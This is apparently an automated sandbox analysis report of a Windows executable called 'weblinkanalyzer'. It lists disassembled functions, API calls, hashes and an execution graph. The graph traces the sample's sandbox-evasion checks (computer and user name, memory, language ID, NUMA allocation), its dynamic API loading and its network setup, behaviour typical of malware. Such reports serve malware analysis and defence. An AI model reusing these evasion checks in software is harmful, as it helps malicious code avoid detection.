                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$HandleModuleNameWrite
                                                                                                                                                                                                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                                                                                  • API String ID: 3784150691-4022980321
                                                                                                                                                                                                                                  • Opcode ID: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                                                                                                                                  • Instruction ID: 92436d38ab3050e8b35fbc92b936da31f470892ba1b2a307495bbf6c2249caee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04978173c4f2aad6ddf0a9b2dd67cf14b182e4245fdcd9156cda6d464bb7ec48
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54318372600618AEDB20A660CE4AF9B776CEB45344F5004BFF945B61C1EAB8AA448F5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404DB4 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DCF
                                                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404DE3
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E0F
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E47
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00403196), ref: 00404E69
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00403196), ref: 00404E82
                                                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00403196), ref: 00404E95
                                                                                                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404ED3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1823725401-0
                                                                                                                                                                                                                                  • Opcode ID: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                                                                                                                                  • Instruction ID: 56fc3daba095db5e8e6f62c072fe8221d0ae9ee3e10054882f672288d86757d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5df378f2b83ba4a7a4bd83ea2c47c7d8eb90fe3c70b4f87b1639606013dd4eda
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E31CDF25042555EDB206BA4DD8483BB69CFB85358716093BF782E3280EA798C5186E9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401F86
                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00401FFB
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 564119183-0
                                                                                                                                                                                                                                  • Opcode ID: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                                                                                                                                  • Instruction ID: a90e581a73a4811956ae2efad35f221ca7a2e3ffda059466d66554c94119bb76
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dedb19f2a2c7d510851ce449977d34ca5ee50571f982d78a6468dda1d4bf86fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21316E31A00355AFDB115FB49F889AF7B78EB45344B10807AFE86F72C1DA748845C7A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403302 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetVersionExA.KERNEL32 ref: 00403321
                                                                                                                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403356
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004033B6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentFileModuleNameVariableVersion
                                                                                                                                                                                                                                  • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                                                                                                                                                                                  • API String ID: 1385375860-4131005785
                                                                                                                                                                                                                                  • Opcode ID: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                                                                                                                                  • Instruction ID: 4b08c86a7d9428a74474774e457b3a663dfcff145a9399c9a999905afefb3de6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20ba641d7c2c240a4f2581cb70a1084239a766f54bb07c670b5bceb4295ae64b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5331287190129869EB328B705C856DA3F6C9B02709F2404FFD544FA2C2DA789F868B19
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404EE6 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStartupInfoA.KERNEL32(?), ref: 00404F3F
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000800), ref: 00404FE5
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(-000000F6), ref: 0040503E
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0040504C
                                                                                                                                                                                                                                  • SetHandleCount.KERNEL32 ref: 00405083
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileHandleType$CountInfoStartup
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1710529072-0
                                                                                                                                                                                                                                  • Opcode ID: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                                                                                                                                  • Instruction ID: 0a81f0dcc5ba0bfdc0506c3f5ccff14beb01dd10c6f3c9adb059a1ad3e4abaaf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a147cda63cbd56541443d39eab919c1850a0cab726875dc0850b494fe71d66
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B851377190460A8BD7208F38CE8476B3B90EB51724F19473EE5A2F72E1D7389845CB9D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406BD7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406BFA
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406C10
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,7U@ ,?,?,00405537,00200020,00000000,?,00000000), ref: 00406C43
                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CAB
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000220,?,00000000,7U@ ,?,00000000,00000000,?,00000000,?,00405537,00200020,00000000,?,00000000), ref: 00406CD0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID: 7U@
                                                                                                                                                                                                                                  • API String ID: 352835431-3990396050
                                                                                                                                                                                                                                  • Opcode ID: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                                                                                                                                  • Instruction ID: 3fc6234a2594f0c7c4f8fd7f4d61d5b765ea0d6a512059466152f22e4b19d7c1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1f8d2d67377f96248cd3247033a7f7d4242d90f19275a8a8973a36c20068efa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A112832900209ABDF228F94CE44ADEBBB6FF48350F154166FA61722A0D736CD71DB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040436C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,004030CC), ref: 00404371
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00404381
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                                                  • API String ID: 1646373207-3105848591
                                                                                                                                                                                                                                  • Opcode ID: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                                                                                                                                  • Instruction ID: ae1f0f37a1caea7582e622d33e18e97b99b5337afe9bfc2040585345cf76d9d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57ac9f24bcaa06145b941f403161d95969617a308a8dce55a53e08ac8357f659
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4C012B0780701A2EA201BB02F0AB1622280B80F02F16243EAB8DF08C2CE7CD805A42D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403CF8 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,00403490), ref: 00403D19
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,00403490), ref: 00403D3D
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,00403490), ref: 00403D57
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,00403490), ref: 00403E18
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,00403490), ref: 00403E2F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 714016831-0
                                                                                                                                                                                                                                  • Opcode ID: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                                                                                                                                  • Instruction ID: 82e4f5ca211df2534f48b16e1633463362d6e61a1909367565888a0a16669b2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fccca46a5bbd356a4c53bb683937cbb2eedd7f0a694d98c675c5506187659c4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2331E370601706ABE3308F24DD49B22BBA8EB48756F14463BE555BB7E1E778AD40CB4C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406582 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(?,00000000), ref: 00406596
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Info
                                                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                                                  • API String ID: 1807457897-3032137957
                                                                                                                                                                                                                                  • Opcode ID: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                                                                                                                                  • Instruction ID: ecf7deb6fed8900c4d79a36e1d1ce5f6dbda1fd4730ae83dc28ca19186aff87e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba08f3b65c0e88e37f7fd760be67015dd5319168190d03478502dac84fc88c2d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D415B31000258AAEB119718DD99BFB3FE8DB01700F1505F6D547F71D2C37A49A4CB6A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00403B4C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403B74
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BA8
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BC2
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00000000,00403914,?,?,?,00000100,?,00000000), ref: 00403BD9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000010.00000002.2011338102.0000000000400000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000010.00000002.2011338102.000000000040B000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_weblinkanalyzer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3499195154-0
                                                                                                                                                                                                                                  • Opcode ID: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                                                                                                                                  • Instruction ID: fcdd260894a6eddc8adf86aaa2b40ca1807c17f8388b21482d04f48ace73d9e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2489dfb7edba8101981c13f95fc6febc3da7b0dfed5f0ee755b7708c58c99a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B111630300206DFD720CF28EE85A227BB6FB897557104B39E592E69A1D771A945CF18
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:3.7%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                  Signature Coverage:1.3%
                                                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                                                  Total number of Limit Nodes:41
                                                                                                                                                                                                                                  execution_graph 78959 401150 78966 414400 GetProcessHeap HeapAlloc GetComputerNameA 78959->78966 78961 40115e 78962 40118c 78961->78962 78968 4143c0 GetProcessHeap HeapAlloc GetUserNameA 78961->78968 78964 401177 78964->78962 78965 401184 ExitProcess 78964->78965 78967 414436 78966->78967 78967->78961 78968->78964 78969 4136b0 79012 402130 78969->79012 78987 4136f0 78988 414400 3 API calls 78987->78988 78989 413703 78988->78989 79146 416fb0 78989->79146 78991 413724 78992 416fb0 4 API calls 78991->78992 78993 41372b 78992->78993 78994 416fb0 4 API calls 78993->78994 78995 413732 78994->78995 78996 416fb0 4 API calls 78995->78996 78997 413739 78996->78997 78998 416fb0 4 API calls 78997->78998 78999 413740 78998->78999 79154 416ea0 78999->79154 79001 4137cc 79158 4135e0 GetSystemTime 79001->79158 79002 413749 79002->79001 79004 413782 OpenEventA 79002->79004 79006 4137b5 CloseHandle Sleep 79004->79006 79007 413799 79004->79007 79010 4137ca 79006->79010 79011 4137a1 CreateEventA 79007->79011 79010->79002 79011->79001 79306 4043b0 LocalAlloc 79012->79306 79015 4043b0 2 API calls 79016 40215d 79015->79016 79017 4043b0 2 API calls 79016->79017 79018 402176 79017->79018 79019 4043b0 2 API calls 79018->79019 79020 40218f 79019->79020 79021 4043b0 2 API calls 79020->79021 79022 4021a8 79021->79022 79023 4043b0 2 API calls 79022->79023 79024 4021c1 79023->79024 79025 4043b0 2 API calls 79024->79025 79026 4021da 79025->79026 79027 4043b0 2 API calls 79026->79027 79028 4021f3 79027->79028 79029 4043b0 2 API calls 79028->79029 79030 40220c 79029->79030 79031 4043b0 2 API calls 79030->79031 79032 402225 79031->79032 79033 4043b0 2 API calls 79032->79033 79034 40223e 79033->79034 79035 4043b0 2 API calls 79034->79035 79036 402257 79035->79036 79037 4043b0 2 API calls 79036->79037 79038 402270 79037->79038 79039 4043b0 2 API calls 79038->79039 79040 402289 79039->79040 79041 4043b0 2 API calls 79040->79041 79042 4022a2 79041->79042 79043 4043b0 2 API calls 79042->79043 79044 4022bb 79043->79044 79045 4043b0 2 API calls 79044->79045 79046 4022d4 79045->79046 79047 4043b0 2 API calls 79046->79047 79048 4022ed 79047->79048 79049 4043b0 2 API calls 79048->79049 79050 402306 79049->79050 79051 4043b0 2 API calls 79050->79051 79052 40231f 79051->79052 79053 4043b0 2 API calls 79052->79053 79054 402338 79053->79054 79055 4043b0 2 API calls 79054->79055 79056 402351 79055->79056 79057 4043b0 2 API calls 79056->79057 79058 40236a 79057->79058 79059 4043b0 2 API calls 79058->79059 79060 402383 79059->79060 79061 4043b0 2 API calls 79060->79061 79062 40239c 79061->79062 79063 4043b0 2 API calls 79062->79063 79064 4023b5 79063->79064 79065 4043b0 2 API calls 79064->79065 79066 4023ce 79065->79066 79067 4043b0 2 API calls 79066->79067 79068 4023e7 79067->79068 79069 4043b0 2 API calls 79068->79069 79070 402400 79069->79070 79071 4043b0 2 API calls 79070->79071 79072 402419 79071->79072 79073 4043b0 2 API calls 79072->79073 79074 402432 79073->79074 79075 4043b0 2 API calls 79074->79075 79076 40244b 79075->79076 79077 4043b0 2 API calls 79076->79077 79078 402464 79077->79078 79079 4043b0 2 API calls 79078->79079 79080 40247d 79079->79080 79081 4043b0 2 API calls 79080->79081 79082 402496 79081->79082 79083 4043b0 2 API calls 79082->79083 79084 4024af 79083->79084 79085 4043b0 2 API calls 79084->79085 79086 4024c8 79085->79086 79087 4043b0 2 API calls 79086->79087 79088 4024e1 79087->79088 79089 4043b0 2 API calls 79088->79089 79090 4024fa 79089->79090 79091 4043b0 2 API calls 79090->79091 79092 402513 79091->79092 79093 4043b0 2 API calls 79092->79093 79094 40252c 79093->79094 79095 4043b0 2 API calls 79094->79095 79096 402545 79095->79096 79097 4043b0 2 API calls 79096->79097 79098 40255e 79097->79098 79099 415ed0 79098->79099 79310 415dc0 GetPEB 79099->79310 79101 415ed8 79102 416103 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 79101->79102 79103 415eea 79101->79103 79104 416164 GetProcAddress 79102->79104 79105 41617d 79102->79105 79108 415efc 21 API calls 79103->79108 79104->79105 79106 4161b6 79105->79106 79107 416186 GetProcAddress GetProcAddress 79105->79107 79109 4161d8 79106->79109 79110 4161bf GetProcAddress 79106->79110 79107->79106 79108->79102 79111 4161e1 GetProcAddress 79109->79111 79112 4161f9 79109->79112 79110->79109 79111->79112 79113 4136c0 79112->79113 79114 416202 GetProcAddress GetProcAddress 79112->79114 79115 416d40 79113->79115 79114->79113 79116 416d50 79115->79116 79117 4136cd 79116->79117 79118 416d7e lstrcpy 79116->79118 79119 401190 79117->79119 79118->79117 79120 4011a8 79119->79120 79121 4011d7 79120->79121 79122 4011cf ExitProcess 79120->79122 79123 401120 GetSystemInfo 79121->79123 79124 401144 79123->79124 79125 40113c ExitProcess 79123->79125 79126 4010d0 GetCurrentProcess VirtualAllocExNuma 79124->79126 79127 401101 ExitProcess 79126->79127 79128 401109 79126->79128 79311 401060 VirtualAlloc 79128->79311 79131 4011e0 79315 415090 79131->79315 79134 401209 __aulldiv 79135 40125a 79134->79135 79136 401252 ExitProcess 79134->79136 79137 413430 GetUserDefaultLangID 79135->79137 79138 413493 GetUserDefaultLangID 79137->79138 79139 413452 79137->79139 79145 4143c0 GetProcessHeap HeapAlloc GetUserNameA 79138->79145 79139->79138 79140 413481 ExitProcess 79139->79140 79141 413463 ExitProcess 79139->79141 79142 413477 ExitProcess 79139->79142 79143 41348b ExitProcess 79139->79143 79144 41346d ExitProcess 79139->79144 79143->79138 79145->78987 79317 416d10 79146->79317 79148 416fc1 lstrlen 79149 416fe0 79148->79149 79150 417018 79149->79150 79152 416ffa lstrcpy lstrcat 79149->79152 79318 416da0 79150->79318 79152->79150 79153 417024 79153->78991 79155 416ebb 79154->79155 79156 416f0b 79155->79156 79157 416ef9 lstrcpy 79155->79157 79156->79002 79157->79156 79322 4134e0 79158->79322 79160 41364e 79161 413658 sscanf 79160->79161 79351 416e00 79161->79351 79163 41366a SystemTimeToFileTime SystemTimeToFileTime 79164 4136a0 79163->79164 79165 41368e 79163->79165 79167 412bb0 79164->79167 79165->79164 79166 413698 ExitProcess 79165->79166 79168 412bbd 79167->79168 79169 416d40 lstrcpy 79168->79169 79170 412bcb 79169->79170 79353 416e20 lstrlen 79170->79353 79173 416e20 2 API calls 79174 412bed 79173->79174 79175 416e20 2 API calls 79174->79175 79176 412bfa 79175->79176 79177 416e20 2 API calls 79176->79177 79178 412c07 79177->79178 79357 402590 79178->79357 79183 416e20 2 API calls 79184 412cd5 79183->79184 79185 416fb0 4 API calls 79184->79185 79186 412ceb 79185->79186 79187 416ea0 lstrcpy 79186->79187 79188 412cf4 79187->79188 79189 416d40 lstrcpy 79188->79189 79190 412d11 79189->79190 79191 416fb0 4 API calls 79190->79191 79192 412d2a 79191->79192 79193 416ea0 lstrcpy 79192->79193 79194 412d36 79193->79194 79195 416fb0 4 API calls 79194->79195 79196 412d5a 79195->79196 79197 416ea0 lstrcpy 79196->79197 79198 412d66 79197->79198 79199 416d40 lstrcpy 79198->79199 79200 412d8b 79199->79200 80001 4141c0 GetWindowsDirectoryA 79200->80001 79203 416da0 lstrcpy 79204 412da2 79203->79204 80011 404540 79204->80011 79206 412da8 80156 40fae0 79206->80156 79208 412db0 79209 416d40 lstrcpy 79208->79209 79210 412dd3 79209->79210 80174 401500 79210->80174 79214 412de7 80329 40f3b0 79214->80329 79216 412def 79217 416d40 lstrcpy 79216->79217 79218 412e13 79217->79218 79219 401500 lstrcpy 79218->79219 79220 412e21 79219->79220 79221 405610 37 API calls 79220->79221 79222 412e27 79221->79222 80336 40f200 79222->80336 79224 412e2f 79225 401500 lstrcpy 79224->79225 79226 412e40 79225->79226 80346 40fd10 79226->80346 79228 412e45 79229 416d40 lstrcpy 79228->79229 79230 412e5e 79229->79230 80690 404c70 GetProcessHeap RtlAllocateHeap InternetOpenA 79230->80690 79232 412e63 79233 401500 lstrcpy 79232->79233 79234 412ed0 79233->79234 80697 40ef80 79234->80697 79236 412ed5 79237 416d40 lstrcpy 79236->79237 79238 412ef8 79237->79238 79239 401500 lstrcpy 79238->79239 79240 412f06 79239->79240 79307 4043db 79306->79307 79308 4043ec strlen 79307->79308 79309 402144 79307->79309 79308->79307 79309->79015 79310->79101 79313 401082 codecvt 79311->79313 79312 4010bd 79312->79131 79313->79312 79314 4010a2 VirtualFree 79313->79314 79314->79312 79316 4011f3 GlobalMemoryStatusEx 79315->79316 